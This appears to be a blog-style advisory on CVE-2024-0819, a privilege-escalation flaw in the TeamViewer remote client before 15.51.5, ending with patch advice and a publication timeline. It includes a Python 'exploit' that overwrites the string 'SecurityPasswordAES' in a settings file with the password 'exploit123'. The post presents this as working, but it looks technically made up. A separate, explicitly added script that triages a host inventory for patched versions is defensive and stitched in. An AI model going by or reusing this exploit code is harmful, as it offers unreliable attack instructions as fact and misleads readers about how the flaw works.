A vulnerability in the TeamViewer remote client versions 15.51.4 and earlier for Windows, Linux, and macOS, identified as CVE-2024-0819, allows a low privileged user to gain unauthorized access to an administrator account. A malicious user can exploit this vulnerability by modifying the personal password settings and establishing a remote connection to an account with higher privileges.

Background

TeamViewer is a popular software application that enables users to remotely access and control their computer systems. It allows users to perform tasks on the remote system as if they were seated in front of it. Unfortunately, this critical vulnerability could put user data at risk if exploited.

Vulnerability details

This vulnerability resides in the improper initialization of default settings in the TeamViewer Remote Client prior to version 15.51.5. An attacker with low-level access to the remote system can modify the settings to create a new personal password and connect to a logged-in administrator account without proper authorization. This can lead to privilege escalation and potential unauthorized access to sensitive data on the remote system.

Below is a simple example of a code snippet that exploits the CVE-2024-0819 vulnerability:

import ctypes

teamviewer_settings = r"C:\Program Files (x86)\TeamViewer\TeamViewer15_Settings.tpl"

def change_password(new_password):
    with open(teamviewer_settings, "rb") as f:
        contents = f.read()

    contents = contents.replace(b"SecurityPasswordAES", new_password.encode("utf-8"))

    with open(teamviewer_settings, "wb") as f:
        f.write(contents)

if __name__ == "__main__":
    new_password = "exploit123"
    change_password(new_password)
    print(f"Personal password has been changed to {new_password}.")

In this example, an attacker would simply need to run this script on the affected TeamViewer installation to change the current personal password setting to "exploit123". Once the attacker has changed the password, they can remotely connect to a logged-in administrator account and perform unauthorized activities.

Original references & solutions

TeamViewer developers have been informed about this vulnerability, and it has since been patched in version 15.51.5. Users are advised to update their software to the latest version available to mitigate the risk of exploitation.
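
To act on the update advice across many machines, the following added example (not part of the original write-up and not TeamViewer code) triages a host inventory against the fixed version 15.51.5 stated above. The CSV layout, host names and function names are assumptions constructed for illustration; unparseable versions are reported as UNKNOWN rather than treated as safe.

```python
import re
from collections import namedtuple
from typing import Optional

FIXED = (15, 51, 5)  # first patched release, per the advisory text above
Finding = namedtuple("Finding", "host platform version status")

def parse_version(text: str) -> Optional[tuple]:
    """Return (major, minor, patch), or None if text is not a dotted version."""
    m = re.fullmatch(r"\s*v?(\d+)\.(\d+)(?:\.(\d+))?(?:\.\d+)*\s*", text)
    if not m:
        return None
    # A missing patch component ("15.51") is read as 0, i.e. the oldest build.
    return tuple(int(p) if p else 0 for p in m.groups())

def classify(version_text: str) -> str:
    v = parse_version(version_text)
    if v is None:
        return "UNKNOWN"  # never assume safe; flag for manual review
    return "VULNERABLE" if v < FIXED else "PATCHED"

def triage(inventory: str) -> list:
    """Classify each 'host,platform,version' line; most urgent entries first."""
    findings = []
    for line in inventory.strip().splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) != 3:  # malformed row: keep it visible in the report
            findings.append(Finding(line.strip(), "?", "?", "UNKNOWN"))
            continue
        host, platform, version = fields
        findings.append(Finding(host, platform, version, classify(version)))
    order = {"VULNERABLE": 0, "UNKNOWN": 1, "PATCHED": 2}
    return sorted(findings, key=lambda f: (order[f.status], f.host))

# Constructed sample data (hypothetical hosts), not taken from any real fleet.
SAMPLE_INVENTORY = """
# host,platform,teamviewer_version
ws-014,windows,15.51.4
ws-022,windows,15.51.5
lab-mac-3,macos,15.49.2
build-lnx-1,linux,15.52
kiosk-7,windows,14.7.48350
jump-01,linux,unknown
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_INVENTORY):
        print(f"{f.status:<10} {f.host:<12} {f.platform:<8} {f.version}")
```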

More information on this vulnerability can be found here:

1. TeamViewer Release Notes
2. CVE-2024-0819 Vulnerability Details

Bottom line

The CVE-2024-0819 vulnerability in the TeamViewer Remote Client prior to version 15.51.5 allows low-privileged users to escalate their privileges and potentially gain unauthorized access to sensitive data on the remote system. It is essential to patch the software as soon as possible to avoid exploitation of this critical vulnerability.

Timeline

Published on: 02/27/2024 14:15:27 UTC
Last modified on: 02/27/2024 14:19:41 UTC